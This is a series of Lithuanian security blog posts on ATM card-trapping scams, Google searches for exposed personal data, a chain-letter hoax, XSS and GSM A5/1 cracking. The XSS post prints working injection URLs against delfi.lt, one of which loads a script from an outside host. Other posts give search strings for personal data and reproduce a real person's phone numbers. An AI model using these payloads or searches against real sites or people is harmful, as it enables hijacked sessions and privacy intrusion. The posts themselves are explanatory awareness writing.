Nepraėjo nei pusė metų, kol vėl normalesnį įrašą sususiruošiau padaryti. Kalbėsiu šį kartą apie magnetines korteles. Viskas prasidėjo nuo įrangos, atkeliavusios štai tokioje dėžutėje.

Skaityti visą įrašą…

Pirmą kartą rašydamas apie iPhone’o laimėjimą šiek tiek “nuvariau” į lankas, nes tiesiog nežinojau visų faktų iki galo. Prisipažįstu klydęs ir įrašą jau pataisiau taip, kaip buvo iš tikro.

Prieš kurį laiką, viename iš lietuviškųjų mini aukcionų, vyko iPhone’o aukcionas. Kažkas iš kolegų pasakė, kad laimėtojas bus nustatytas tam tikrą dieną per vieną valandą. Nereikės siųsti jokių sms’ų, tiesiog pakaks pateikti daugiausiai siūlymų ir tuo pačiu daugiausiai kartų užkelti kainą. Kitas kolega Rolandas, jau turintis iPhone’ą, pasigavo šią idėją ir, žinoma, dirbdamas programuotoju, nusprendė visa tai automatizuoti. Nors statymai turėjo būti priimami tik kitą dieną, bet jis jau per artimiausią pusvalandį parašė reikiamą skriptą ir pradėjo laukti rytdienos. Tiesą sakant, iPhone’o visiems reikėjo mažiausiai. Įdomiausia buvo įsitikinti tokių aukcionų sąžiningumu ir galimybe laimėti beveik 1000 Lt kainuojantį daiktą.

Screenshot’as turimas jau tik iš Google cache’o. Paspaudę paveikslėlį, galite jį išsididinti.

Skaityti visą įrašą…

Na rodos pagaliau baigiau visas savo vasaros atostogas. Viskas buvo gerai, kol neprireikė skristi atgal FlyLAL’u. Išskridau beveik 5 valandom vėliau nei turėjau (visą tą laiką teko praleisti oro uoste), leidomės Kaune, važiavom iki Vilniaus autobusu, o bagažas nuskrido kitu lėktuvu ir atsirado tik kitą dieną po pietų. Vietoj planuotų 7 valandų kelionės namo, ji užtruko visas 14 ir namie buvau tik 5:00, dėl ko sėkmingai buvo iki galo sufakapinta ir visa pirmadieninė darbo diena. Oro uoste priežasčių tiksliai paaiškinti negalėjo, bet kažkodėl vietoj vieno didelio lėktuvo atskrido du maži. Žinoma, FlyLAL’as elgėsi lietuviškai. Neišstenėjo net ir kriu kriu, nors ir buvo didelė didelė kiaulė (tokia rožinė, boingo dydžio). Dabar “džiaugiuosi” galėdamas dirbti visą savaitę po 12 valandų per dieną už praleistą pirmadienį (planas buvo po 10). Šiandien vakarop (naktį?) jau sugebėjau žvilgtelėti ir kas čia įdomaus aplinkui vyksta. Užkliuvo mokyklų elektroninio dienyno istorija. Šiaip viskas įvykdyta pakankamai neetiškai, nes pažeidžiamumas su detaliomis instrukcijomis paskelbtas viešai prieš tai neinformavus sistemos kūrėjų ir jo nepašalinus. Viso pažeidžiamumo akcentas buvo ne galimybė moksleiviams pasiredaguoti pažymius ar pastabas, bet galimybė pavogti asmeninius duomenis. Tad šį kartą norėčiau grįžti prie šios temos ir eilinį kartą panagrinėti tuos atvejus, kai asmeniniai duomenys paviešinami dėl žmonių, o ne sistemų klaidų. Beveik prieš metus rašiau apie būdą, kaip Google pagalba internete ieškoti asmens kodų.

Apie Google galimybes formuojant paieškos užklausas taip pat jau šiek tiek rašiau anksčiau įraše apie WebShell’us. Panašiu principu Google galima išnaudoti ir asmenų paieškai internete. Pavyzdžiui, paieškokim asmenų sąrašų, nurodydami Google sistemai ieškoti žodžių “vardas pavardė” ir paiškos rezultatus apribodami tik iki Excel failų iš Lietuvos. Gaunasi štai tokia nesudėtinga užklausa: http://www.google.lt/search?hl=lt&q=vardas+pavard%EB+filetype%3Axls&meta=cr%3DcountryLT. Karatistai iš karto išsiveržia į priekį, iš paskos keliauja ir kitų sportininkų sąrašai.

Kiekvienam tokiam rastam faile duomenų gali būti labai įvairių. Nuo užimtos vietos varžybose iki pažymių vidurkio skaičiavimo mokykloje ar gimimo datos ir gyvenamos vietos. Galima rasti ir pranešimus SODRAI apie priėmimą į darbą su visais asmeniniais duomenimis, vairuojamus automobilius bei jų valstybinius numerius ir t.t. Ieškoti, žinoma, galima įvairiai. Ko ir kiek surasite priklauso tik nuo Jūsų pačių formuojamų užklausų ir to, ką suindeksavusi turi Google sistema.

Na žmonių sąrašus gauti jau galime. Galime netgi pasiskaityti apie juos daugiau į tą patį Google suvedę žmogaus vardą ir pavardę. Bet sutikit, juk kartais taip knieti pasižiūrėti kaip atrodo vienas ar kitas žmogus. Na pvz., kai maloniai telefonu su kuo nors nepažįstamu pabendrauji ir susitari dėl susitikimo. Juk į jį daug geriau eiti, kai žinai kaip tas žmogus atrodo ir žinai ko nuėjus ieškoti. Kažkaip ramiau tuomet. Ir štai čia į pagalbą ateina jau ne tik Google, bet ir socialiniai tinklai. Vienas iš tokių tinklų, kuriame žmonės nesivaržydami deda savo nuotraukas ir tikrus vardus bei pavardes, yra klase.lt. Nors pats tinklalapis asmenų paieškos neturi, tačiau ir čia galima išnaudoti Google paiešką. Pavyzdžiui, man visuomet knietėjo sužinoti ar iš tiesų yra Lietuvoje Jonas Jonaitis bei kaip jis atrodo. Tam per Google reikia suformuoti tokią užklausą: http://www.google.lt/search?hl=lt&q=Jonas+Jonaitis+site%3Aklase.lt. Joje rezultatai paimami tik iš klase.lt portalo. O jame Jonų Jonaičių ne tiek ir mažai.

Jis iš tiesų egzistuoja, bet tikrasis yra tik vienas, 1988 metais baigęs 12b klasę Vilniaus Antakalnio (18-oji) vidurinėje mokykloje. Galima netgi pamatyti ir kaip jis atrodo.

Ir vėl, naudojomės tik Google paieškos sistema, bet sugebėjom pasižiūrėti kaip atrodo žmogus. Jei paliksite duomenis be priežiūros, Google juos būtinai suindeksuos, o kas nors būtinai sugalvos kaip juos susirasti. Pabandykite paieškoti savęs. Kokių duomenų dar trūksta Jūsų pasui pasigaminti? Ar juos jau sudėjote į internetą?

Baigėsi mano atostogos. Visai smagiai su draugais pabuvau Slovakijoje. Didžiąją dalį laiko kopinėjom kalnais (su nakvyne juose), kartais plaukiojom upe. Čia aš plaukiu plaustu.

Kur dar 4 plaukę kartu - velniai žino. Gal dar neišnėrę. Važiavom savu automobiliu, nes su kelionių agentūra taip nepasilinksminsi. Bet ne apie tai bus šis pasakojimas. Šį kartą papasakosiu apie tai, kaip technologijų neišmanantys, bet lengvai bendraujantys apgavikai švarina svetimas mokėjimo korteles. Kadangi dažniausiai įdomūs pasakojimai su visomis smulkmenomis, tai jis bus gausiai iliustruotas. Tiesa, iliustracijos ne mano, “vaikščiojančios” internetu, bet puikiai tiks šiam pasakojimui. Kai ką ir nutylėsiu, kad visokie “gudručiai” nepradėtų to taikyti praktikoje. Technika žinoma labai senai ir vis dar naudojama. Važiuojam.

Turim pilietį, kuris, rodos, tiesiog naudojasi bankomatu. Ką jis daro iš tiesų? Jis spendžia spąstus kitam, kuris bandys pasinaudoti šiuo bankomatu.

Aišku, netoli “ant šūcherio” stovi draugelis, kuris įspėja apie visokius galinčius kilti nesklandumus arba tiesiog įspėja apie artėjančią naują auką.

Prie judriose vietose esančių bankomatų aukų ilgai laukti nereikia. Priėjęs žmogelis įkiša savo kortelę, surenka pin kodą, atlieka operaciją ir negauna atgal kortelės. Kas? Kodėl? Kur prapuolė kortelė? Žinoma, į pagalbą jau ateina “gelbėtojai”.

Gerasis “gelbėtojas” pradeda atsargiai bendrauti su nuskriaustuoju, pasako, kad ir jam taip buvo nutikę ir t.t. ir t.t. Tačiau pagrindinis jo tikslas, sužinoti konfiskuotos kortelės pin kodą, taikant socialinės inžinerijos metodus. Žinoma, laikantis geriausių jos tradicijų, aukos dėmesys yra nukreipiamas visai kitur. Šiuo atveju naudojamasi aukos noru atgauti kortelę ir pasiūlomas sprendimas. Norint, kad bankomatas grąžintų kortelę, reikia vienu metu spausti “Enter” ir “Cancel” mygtukus, kai renkamas pin kodas. Aišku, viena auka to taisyklingai padaryti negali, todėl “gelbėtojas” jai padeda tai atlikti ir tuo pačiu labai gerai mato, koks pin kodas renkamas.

Žinoma, kortelė atgal neišlenda. Aukai belieka kreiptis į banką. Auka jaučiasi ramiai dėl savo kortelės saugumo, nes ji bankomate, kurio niekas taip paprastai atsidaryti negali. Tiek auka, tiek “gelbėtojas” išeina.

Įsitikinęs, kad viskas saugu, nusikaltėlis grįžta atgal, iš spąstų išsitraukia kortelę, pasinaudodamas pin kodu nusiima iš jos galimą maksimalią pinigų sumą ir dingsta.

Dabar įdomiausioji dalis. Spąstai. Jie atrodo štai taip.

Jokių papildomų klaviatūrų, kamerų, nuotoliniu būdu perduodamų duomenų ir kitokių technologijų. Ir kas blogiausia, kad tokius spąstus pastebėti yra pakankamai sunku, nes jų kyšo tik patys galiukai, kurie dar būna ir priklijuojami.

Didesnės rezoliucijos nuotraukų ir kitokių aprašymų, iš ko reikia, ką reikia ir kaip reikia padaryti, kad spąstai būtų tinkami ir pagautų kortelę, nebus. Ne toks šio įrašo tikslas. Tiesiog atkreipkit dėmesį į tai, kaip pasinaudojant pačiais žmonėmis bei visiškai nesudėtingais ir pigiais sprendimais, nusikaltėliai pasiekia norimą rezultatą. Sudėtingiems uždaviniams paprasti sprendimai. Silpnąja vieta čia tampa ne pats bankomatas, bet žmogus, išduodantis savo pin kodą. Spaudoje jau ir anksčiau buvo bankų atstovų pranešimų apie tai, kad prieš naudodamiesi kortele, įsitikintumėte ar bankomatas saugus. Bet kaip gi žinoti nuo ko saugotis ir ko ieškoti? Dabar jau žinosit ir galėsit atkreipti dėmesį ir bet kokioje situacijoje nesakysit savo slaptažodžių ir pin kodų kitiems. Manau, kad ateityje galėsim pakalbėti ir apie pažangesnius apgavysčių būdus, o šiam kartui tiek ir nepamirškite įspėti kolegų, nes būdas nors ir senas, bet vis dar sėkmingai naudojamas. Pastebėję tokią apgavystę būtinai informuokite banką.

Ar girdėjot, kad Rusijos hakeriai ruošiasi pulti Lietuvą, Latviją, Estiją ir Ukrainą? Daugiau apie tai skaitykit čia: http://www.lrytas.lt/-12144139011212111835-p1-IT-Rus%C5%B3-hakeriai-planuoja-kibernetin%C4%AF-i%C5%A1puol%C4%AF-prie%C5%A1-Baltijos-%C5%A1alis-ir-Ukrain%C4%85.htm Pirmas rezultatas jau yra. Vyriausioji tarnybinės etikos komisija.

Pagal Lietuvos tinklalapių ir sistemų saugumo būklę, tai tikrai ne paskutinis. Kas kitas?

Gavau tik ką į paštą štai tokį laišką.

Si eilerasti parase veziu serganti paaugle. Ji noretu suzinoti, kiek zmoniu gavo jos eilerasti. Tai tikrai yra eilerastis.
Prasome perduoti ji kitiems. Ji issiunte jos gydytojas – butinai perskaitykite, kas parasyta baigiamajame zodyje po eilerasciu.

Lėtas šokis

Ar kada nors stebejote vaikus,
Skriejancius ratu?
Ar klausetes,
kaip lietus
Tyska i zeme?
Ar kada nors grozejotes drugelio sokiu?

<…praleista daug daug teksto…>

Brangieji,
Perduokite si laiska visiems, kuriuos pazistate ir net kuriu nepazistate! Tai yra nepaprastos mergaites, kuri greitai
paliks si pasauli, prasymas. Ji serga veziu. Mergaitei liko gyventi tik sesis menesius. Kaip savo paskutini nora ji norejo issiusti laiska, kuriame praso visus gyventi kuo pilniau, nes jos jau nebus. Ji niekada nesoks isleistuviu baliuje, niekada nebaigs mokyklos, neistekes ir netures vaiku. Issiusdami si laiska kuo daugiau zmoniu , jus suteiksite maza vilti jai ir jos seimai, nes uz kiekviena naujam adresatui issiusta laiska Amerikos Vezio draugija skirs 3 ct jos gydymo programai. Vienas jaunuolis issiunte si   laiska 500 zmoniu! Tad as zinau, kad mes galime issiusti tokius laiskus bent   5 ar 6 adresatams! Tai yra ne jusu pinigai, o tik jusu laikas!   Perduokite tai, kaip paskutini prasyma.

Greta Kupcinskiene
KMUK Akuserijos ir ginekologijos klinikos administratore
Eiveniu 2,
50009Kaunas
d.t. +370 37 327148 , mob. t. +370 698 03325
faksas +370 37   327076 buki gerutis prisidek prie sios akcijos, ir ispildykime sios merginos nors paskutini nora
(linkiu kad nepagailetum savo brangaus laiko ir issiustum savo kontaktam

Tokie laiškai turi savo pavadinimą - HOAX. Kas tai tokio galite pasiskaityti VRM kurse arba Wikipedijoje. Niekas už tokių laiškų persiuntimą pinigų nemoka. Anksčiau, kai internetas buvo labai lėtas, tokių laiškų kiekis su prisegtais paveikslėliais darydavo tam tikrą trumpalaikę įtaką sistemoms, jas papildomai apkraunant, tačiau koks tikslas iš tokių laiškų dabar - nežinau. Greta Kupčinskienė iš tiesų dirba Kauno klinikose, tačiau pati nežino, kodėl jos duomenys naudojami šiame laiške. Apie tai dar 2007 lapkritį rašė Kauno diena. Bet ne apie tai kalba. Daug įdomiau tokius laiškus gauti dėl juose esančių kontaktų. El. pašto adresų, vardų, pavardžių ten būna iš tiesų daug. Ne visų įmonių, ir tuo labiau privačių asmenų, tokie duomenys skelbiami viešai. Tad tokie laiškai yra puikus pradinis informacijos šaltinis. Dabar gautame laiške iš viso buvo 725 el. pašto adresai, iš kurių daugiau nei pusė galune “.lt”. Tarp jų - Lietuvos mutinės, SEB, Hansa bankų el. pašto adresai bei kitų įvairių lietuvos įmonių. Tubūt įdomiausias adresas laiške yra seimo_nariai@lrs.lt. Juo laišką balandžio 14 dieną išsiuntė Roma Žakaitienė, iki balandžio 7 d. buvusi Švietimo ir mokslo ministre. Toliau į jos laišką atsiliepė Audronius Azubalis, kuris laišką persiuntė 2 kontaktams. Iš tų dviejų vienas laišką toliau persiuntė jau 7 žmonėms ir t.t. iki 725 el. pašto adresų. Ir tai tik viena laiško šaka. Žodžiu, ex ministrė turi daug laisvo laiko po atsistatydinimo. O Jūs dabar galite imti ir išsakyti viską ką galvojate ar kuo skundžiatės visiems seimo nariams iš karto. Adresą turite. Gal kažkuris irgi atsilieps į Jūsų bėdą. O tie, kurie tokius laiškus persiuntinėja ir mano darantys kažką gero, tegu geriau pasinaudoja šia paieška ir perveda 2% savo pajamų mokesčio. Irgi nieko nekainuos, bet naudos bus daug daugiau. Beje, kokių įdomesnių kontaktų randate Jums ateinančiuose Hoax’uose?

Kadangi senai rašiau apie web saugumą, apklausoje daugiausiai balsų kol kas renka praktinių pamokų noras, o dar ir į el. paštą atėjo su tuo susijęs laiškas, tad šiandien ir parašysiu apie šiuo metu populiariausią ir daug diskusijų keliantį tinklalapių pažeidžiamumą. Tas web pažeidžiamumų pirmūnas yra Cross Site Scripting, kuris trumpinamas tiesiog XSS. XSS, o ne CSS todėl, kad tiesiog nebūtų painiojama su Cascading Style Sheets. Pagal įvairius duomenis jis sutinkamas 75%-80% tinklalapių. Lietuviški nei kiek neatsilieka. Kaip pasireiškia tas pažeidžiamumas? Pažeidžiamumas yra nukreiptas ne prieš pačius tinklalapius, bet prieš jų vartotojus. Jei tinklalapyje yra palikta tokia skylė, tuomet jo lankytojui galima pakišti papildomą HTML kodą arba skriptą, kurį lankytojo naršyklė apdoros ir įvykdys kaip originalų. Ką su tuo galima padaryti? Kai tik toks pažeidžiamumas buvo atrastas, tuomet dažniausiai buvo tiesiog dedamas Java skriptas, kuris vykdydavo amžiną ciklą ir mesdavo lankytojams nesibaigiantį pranešimą. Žodžiu, toks “baeris”, kuris neduodavo normaliai naršyti. Vėliau sėkmingai buvo pradėtos klastoti tinklalapių dalys. Pvz. bankinėje sistemoje ant originalių prisijungimo laukelių uždėdavo niekuo nesiskiriančius padirbtus prisijungimo langelius, kurie tiesiog surinkdavo prisijungimo duomenis ir persiųsdavo nusikaltėliams. Vėliau, be puslapių klastojimo į darba stipriai buvo “pajungti” visokie skriptai, vykdomi naršyklėje. Dabar JavaScript’o pagalba vagiami duomenys, apeinant ugniasienę patikrinamas vidinio tinklo saugumas, išnaudojami įvairūs pažeidžiamumai (pvz. perkonfigūruojami vidiniai router’iai), perimamos naršymo sesijos, admino teisės, pavagimai ištisi blogai ir t.t. Žodžiu, galimybių daug. Jei koks nors programuotojas sako, kad čia š…, o ne pažeidžiamumas, tai sumažinkit jam algą (arba pasiūlykit tą padaryti jo šefui). Dvigubai. Kol netnaujins žinių. Jei toks programuotojas esi tu pats, tai skubėk pasitasyti, kol tavo šefas tau nesumažino algos. Dvigubai. O jei rimtai, tai šiandien, išnaudojantys XSS pažeidžiamumą, po internetą jau sklando virusai ir valdomi botnet’ai. Tiesa, botnet’e dalyvis aktyvus būna tol, kol veikia naršyklė. Ir jei neišnaudojami kiti naršyklės pažeidžiamumai ir nepavyksta įkišti į OS kokio papildomo malware’o, tai iš tokio botnet’o pasišalinama tiesiog uždarant naršyklę. Žodžiu, čia buvo šiek tiek teorijos. Dabar kaip visa tai atrodo gyvai. Štai čia ir pacituosiu prieš kurį laiką man atėjusį laišką (kalba netaisyta).

Sveiki,
Siunčiu informacijos, kuri gali pasirodys įdomi.
Galbūt teko girdėti apie tinklapį xssed.com. Taigi turiu surinkęs
keletą lietuviškų tinklapių su tapačiu pažeidimu.
http://www.xssed.com/archive/author=F3nix/
Yra ir info.lt, delfi.lt ir t.t.
Delfi.lt tiesiog stebina savo aplaidumu. XSS skylė vis dar neužtaisyta, nors nuo pranešimo administratoriam praėjo bemaž pusė metų.

http://www.delfi.lt/archive/article.php?id=1625&s2f=1&sendit=1&fromName=%3Cscript%20 src=http://lol.freehost.lt/1.js%3E%3C/script%3E

Taip. Xssed.com yra tinklalapis, kuriame gali registruoti surastus XSS pažeidžiamumus, už tai gauti taškus (kitą kartą papasakosiu kaip už tai gauti ne taškų, bet pinigų), užimti vietą reitingų lentelėje ir t.t. Pasirodo ten sėkmingai dalyvauja ir lietuvis F3nix. Sistemų priregistravęs daug ir visokių. Vienos jau susitvarkiusios, kitos dar ne. Tarp pastarųjų yra ir delfi.lt. Jis ir pateikia pačio paprasčiausio XSS pažeidžiamumo išnaudojimo pavyzdį. Tiesiog įvykdomas JavaScript’as, kuris lankytojui parodo pranešimą. Galim pasilinksminti ir labiau nedarydami nieko blogo. Pvz. priverskim delfi.lt rodyti alfa.lt turinį:

http://www.delfi.lt/archive/article.php?id=1625&s2f=1&sendit=1&fromName=%3Cscript%3Edocument.writeln(’%3Ciframe%20style=%22position:absolute;%20top:%20150px;%20left:0px;%22%20frameborder=0%20height=1500px%20width=100%%20src=http://www.alfa.lt/%3E’);%3C/script%3E

O jei taip botnet’ą? Su delfi lankomumu jis turėtų gautis nemažas. Gerai, kad to dar niekas nesugalvojo padaryti (o gal jau?). Manau programuotojai greitai pagavo kampą kas ir kodėl čia įvyksta. Taigi, šis pažeidžiamumas dažnas klaidų ir paieškos puslapiuose. Pavaikščioję po F3nix surinktą katalogą būtent tai ir pamatysit. Jo kataloge taip pat pilna iš esmės tik vieno tipo XSS pažeidžiamumų, t.y. vaizduojamojo. Be vaizduojamojo dar būna išsaugomasis (kai nereikia vartotojo priversti kažką spausti) ir DOM (išnaudojantis išskirtinai JavaScript trūkumus). Bet į tai daugiau nesigilinsiu, nes principą jau turėjote suprasti, beliko detalės.

Tuo tarpu aš nusprendžiau pakalbinti patį F3nix. Paprašiau tiesiog trumpai jo papasakoti apie save. Atsakymą gavau tokį (kalba netaisyta):

Na tai trumpai ir parašysiu, nes nesinori per daug lyst viešumon.
Esu 19 metų, ir jau tris metus aktyviai kovoju už vartotojų saugumą.
XSS pažeidiamumai, matyt, paprasčiausi, todėl juos galima viešinti,
nes paviešinus kokį SQL, turbūt tą pačia dieną atsirastų įsilauželis
besinaudojantis kitų surastomis spragomis.
Dėl XSS tipo pažeidžiamumų per nelyg galvos nesuku ir pranešu
administratoriams tik jei tipiškas pažeidžiamumas pasikartoja visoje
sistemoje ar aukštus reitingus turinčiame puslapyje (delfi, info,
sonex ir t.t).
Radęs SQL pažeidžiamumus, nedelsiant informuoju adminstratorius, ir
labai sveikintina, kad daugelis iš jų sureaguoja tą pačia dieną. Kai
pavyzdį pateiksiu rem.lt, kurie dar ir labai gražiai padėkojo.
Lietuviškų tinklapių saugumas iš tiesų pasibaisėtinas. Žvilgterkim į
ieškok.lt, pasinaudojus cookie pakeitimu buvo galima prisijungti bet
kuriuo kitu vartotoju. Neilgai trukus puslapis buvo atnaujintas, bet
paliekant dar baisesnė klaidą - laisvą priėjimą prie visų vartotojų
duomenų bazės.
Nieko stebėtino, netgi valstybiniuose puslapiuose saugumo klaidų apstu.
Ir galiausiai, gal galėtum mestelt sakinį su mano email, kad už tam
tikrą užmokestį analizuoju tinklapius ir ieškau pažeidžiamumų.

O beje, nepaminėjau www.e*******y.lt. Ponai labai save reklamuoja, bet
iš didelio rašto išėjo iš krašto. Jų ženkliuku pažymėti tinklapiai,
neva saugūs, yra skylėti kaip rėčiai…. Labai panašu į neseniai
nuaidėjusį HackerSafe skandalą.

Nuo savęs galiu tik pridėti, kad jam apie surastus pažeidžiamumus sekasi informuoti geriau nei man. Jo rastus, lengviau išnaudojamus pažeidžiamumus, bent jau susitvarko greičiau. Aš kol kas geriausiu atveju gaudavau tik “ačiū” arba nieko ir labai gerai jei kas nors po to pasikeisdavo. Kažkaip man dažnesnis būdavo delfi.lt atvejis, kai niekas nereaguodavo bent pusę metų. Matau, kad pasikeitmai vyksta ir šioje srityje. Programuojantys, tikiuosi, suskubs tvarkyti savo sistemų, nes kaip patys matot, klaida populiari ir ne visuomet paprastai aptinkama. O daro ją visi kas netingi. Tie kas tingi irgi. Dvigubai daugiau.

Noriu sugrįžti prie senesnės temos. T.y. apie mobilaus šnipinėjimą. Apie tai jau rašiau anksčiau, tačiau ne taip senai pasirodė įdomių naujienų. Bet gal nuo pradžių. GSM tinkluose yra naudojamas A5/0, A5/1 arba A5/2 šifravimo algoritmai. A5/0 žymėjimas reiškia, kad nenaudojamas joks šifravimas. A5/2 šifravimas lengvai įveikiamas naudojant nesudėtingą techniką. Šie du šifravimo būdai dėl savo nepatikimumo mažai kur pasaulyje naudojami (pvz. Serbijoje, Indijoje, Kenijoje), o visame pasaulyje labiausiai yra išplitęs 64 bitų A5/1 šifravimo algoritmas. Apie jo principą paskaitysite Wikipedijoje, tačiau jau kelis metus kalbama ir apie šį algoritmą, kad jis yra nesaugus ir nulaužiamas. Operatoriai guodėsi tuo, kad tas laužimas reikalauja daug laiko ir dar daugiau technininių resursų, todėl atitinkamai ir pinigų. Tų pinigų visam sprendimui reikėjo maždaug 1 000 000 USD. Kaip manot, kokios institucijos yra labiausiai suinteresuotos šnipinėjimu ir kurios gali tam išleisti tiek pinigų? Aišku, kad žmonos šnipinėjimui tiek investuoti nelabai kas ryžtūsi, privačiam verslui tai taip pat neapsimokėtų. Kas belieka turbūt jau aišku, o konkrečias struktūras galėsite atsirinkti ir patys. Žodžiu, kam labai reikėjo, tas tokią įrangą nusipirko. Įrangos tam yra įvairios. Pvz. vienos, nei šiokios, nei tokios, veikimo principas yra "aktyvi ataka", kurios metu reikia būti pakankamai arti reikiamo abonento, tuomet pradedama truputį "teršti" eterį, kad telefonas prisijungtų ne tiesiogiai prie operatoriaus GSM bazinės stoties, bet tyčia prie pakištos kitos, tarp kurios ir telefono šifravimas nevyksta ir t.t. Žodžiu sudėtinga ir daug vargo.

Bet šiemet atsirado "gerų" naujienų. David Hulton ir Steve Miller teigia sukūrę metodą, kurio pagalba GSM šifravimą galima iškoduoti per kelias minutes. Ir gera naujiena ta, kad reikiamos įrangos kaina prasideda nuo 1000-1500 USD. O tai reiškai, kad tokia įranga tampa prieinama ne tik valstybinėms struktūroms, bet ir mėgėjams ar nusikaltėliams. Kita "gera" naujiena, kad šio metodo principas yra "pasyvi ataka", t.y. nereikia su niekuo niekur į eterį kištis ir nieko spinduliuoti ar transliuoti, o pakanka tiesiog tyliai sėdėti ir gaudyti kas sklando aplinkui. Atitinkamai padidėja ir pasiklausymo nuotolis bei sunkiau tokį dalyką aptikti. Ryšio iššifravimas įvyksta per kelias minutes ir tam panaudojama jau senai IT saugumo pasaulyje žinoma technika "Rainbow tables". Dabar padarom nedidelį, atskirą ir techninį skyrelį.

Kas yra rainbow tables? Tai tiesiog iš anksto išskaičiuotų hash‘ų duomenų bazės, kurių pagalba paprasta atstatyti pradinį nekoduotą tekstą. Pvz. MD5 yra vienkryptis algoritmas. Programuotojai jį mėgsta panaudoti slaptažodžių maskavimui. T.y. jie sistemoje išsaugo ne vartotojo nurodytą slaptažodį, bet jo MD5 hash’ą. Pvz. jei žodį "labas" perkoduosim į MD5, tai gausim tokią reikšmę: 2e53d715b9d776b6c45263d31ecd3d87. Kai vartotojas bando prisijungti prie sistemos, tuomet sistema paima įvestos reikšmės hash’ą ir jį sulygina su sistemoje saugomo slaptažodžio hash’u. Jei reikšmės sutampa, vadinasi vartotojas įvedė reikiamą slaptažodį. Tačiau jei įsilaužėlis iš sistemos sugebės gauti visus saugomus slaptažodžių hash’us, tai pagal juos pradinio slaptažodžio jis atkurti negalės (tai ir yra vienkrypčio algoritmo esmė, į viena galą - aha, o atgal - nea). Vienintelis būdas iš hash’o nustatyti tikrąjį vartotojo slaptažodį yra imti įvairius žodžius, iš jų išskaičiuoti MD5 hash’ą, jį sulyginti su turima reikšme ir taip kol pataikysi. Žodžiu labai ilgai trunkantis procesas. Tačiau čia į žaidimą ir ateina vaivorykštinės lentelės. Pvz. iš anksto paimamos visos galimos klaviatūros simbolių kombinacijos iki 6 simbolių ir iš anksto išskaičiuojami jų MD5 hash’ai. Gaunamos didelės duomenų bazės, kur šalia bet kokios 6 simbolių kombinacijos iš karto yra saugoma jos MD5 hash’o reikšmė. Tad jeigu įsilaužėlis iš sistemos iškrapšto slaptažodžio MD5 reikšmę, tuomet viskas ką reikia padaryti, tai turimoje DB surasti ką atitinka turimas MD5. Originalus slaptažodis tokiu būdu atstatomas per keletą minučių. Kiek trunka generavimas? Ankstesniam darbe kolega prieš keletą metų visas galimas Windows sitemų LM hash’ų reikšmes iki 6 simbolių ilgio slaptažodžiams tik iš raidžių ir skaičių keturiais serveriais generavo berods 3 dienas. Gavosi lyg ir 6 GB duomenų bazė. Nebepamenu tiksliai. Tačiau iš anksto atlikus visą ilgai trunkantį hash’ų išskaičiavimą, vėliau pradinis slaptažodžio atstatymas iš jo užtrunka vos kelias minutes. Nuostabu, ar ne? Dabar tokio tipo duomenų bazių įvairiems hash’ams jau prikrautas visas internetas. Gali nusipirkti sugeneruotų su visu HDD iš karto arba rasti nemokamai ir parsisiųsti. Ilgesniems slaptažodžiams jos užima ir 20 Gb, ir 70 Gb ir dar daugiau Gb. Tik turėk kur saugoti.

Taigi, back to business. Grįžtam prie GSM tinklų ir techninių reikalų. Tam, kad sėkmingai ir pakankamai greitai GSM ryšį būtų galima iššifruoti, reikia trijų dalykų: sim kortos unikalaus numerio (taip vadinamo "subscription identification number"), telefono aparato numerio (IMEI) ir A5/1 algoritmo hash’ų (keystream’ų) "rainbow tables" DB. Pirmuosius du galima gauti tiesiog paskambinus reikiamam abonentui ir tas reikšmes nuskaityti, nes jos operatorių dažnai perduodamos nešifruotos (nors pagal standartus šifruoti turėtų). O vat su DB jau sunkiau. Pagal A5/1 algoritmą, skirtingų perkoduotų reikšmių iš viso gali būti 288 230 376 151 711 744 variantų (kaip šitas skaičius vadinasi?). Vienas įprastas personalinis kompiuteris gali išskaičiuoti maždaug 550 000 reikšmių per sekundę. Tad visom reikšmėm gauti reikėtų maždaug 33 235 metų. Tačiau anie du minėti piliečiai skaičiavimus atlieka naudodami 64 FPGA (field-programmable gate array) sistemas/modulius (net nežinau kaip pavadinti lietuviškai). Jomis visa A5/1 algoritmo "rainbow tables" DB bus sugeneruota maždaug per 3 mėnesius. Kovo mėnesį jie visą, maždaug 2 terabaitų, DB planavo pateikti viešam naudojimui. Kol kas aš jos dar nerandu. Bet anot kūrėjų, surasti reikiamą reikšmę toje DB, saugomoje šešiuose HDD po 350 Gb, su vienu FPGA užtruks ~30 min. (arba galima tam panaudoti botnet‘ą). Naudojant šešioliką 128 Gb flash diskų ir 32 FPGA, visas procesas truks ~30 sekundžių. Taigi, naudodamas pigią sistemą už 1000 USD iššifruotą pokalbį turėsi po 30 min., o naudojant brangesnę, kainuosiančią nuo 200 000 USD, klausytis bus galima beveik realiu laiku. 2008 m. antrame ketvirtyje turėtų pasirodyti jų parduodamos, pilnai naudojimui paruoštos sistemos, kurių kaina priklausys nuo to, kaip greitai reikės iššifruoti GSM srautą (nuo to priklausys FPGA modulių kiekis). Bet jos jau nekainuos milijono USD, o kadangi visos DB bus viešos, tai dešifravimo sistemas galės konstruotis ir entuziastai. Į tai iš karto sureagavo hakerių "The Hackers Choise" grupuotė, kuri subūrė iniciatyvinę grupę pigios A5 laužimo sistemos kūrimui. Jų puslapyje rasite daugiau įvairios informacijos, pvz. kaip pasitikrinti kokį šifravimo algoritmą naudoja Jūsų operatorius arba kaip patiems susikonstruoti savo GSM anteną. Be minėtos kompiuterinės technikos, GSM ryšio sugaudymui, dar reikės ~700 USD kainuojančio imtuvo, galinčio dirbti 0-3 GHz dažnių intervalu.

Ką į tai sako operatoriai? Na, jų nuomone, visų pirma tai tik teorija ir kol nėra konkrečių veikiančių sistemų, tol jie dar tik galvos apie saugesnio A5/3 algoritmo diegimą.

P.S. Turiu nuojautą, kad nebus nei vieno komentaro, nes kitiems čia kažkoks kosmosas pasirodys.

Šiandien mane kaip reikiant sunervavo nezinau.lt su savo blogorama. Joje radau, kad bilietai į Blogin konferenciją jau pasibaigę. Kadangi šiandien pagaliau paaiškėjo, kad penktadienis man neužimtas, tai rytdieną planavau pradėti nuo bilieto pirkimo. Tai ką dabar rytoj ryte veikt? Ei, Blogin organizatoriai, kaip pirmo etapo blog’ų konkurso nugalėtojui galėtumėte kokį bilietą ir sukrapštyti. Žodžiu turiu problemą dabar gyvenime. Kur gauti bilietą?

Kad jau taip, tai pabūsiu šiandien blogas ir supažindinsiu Jus su linux live distribucija Backtrack 3. Kol kas tik beta. Bet jos autoriai sako, kad ne betoje bus tik didesnis suderinamumas su įranga.

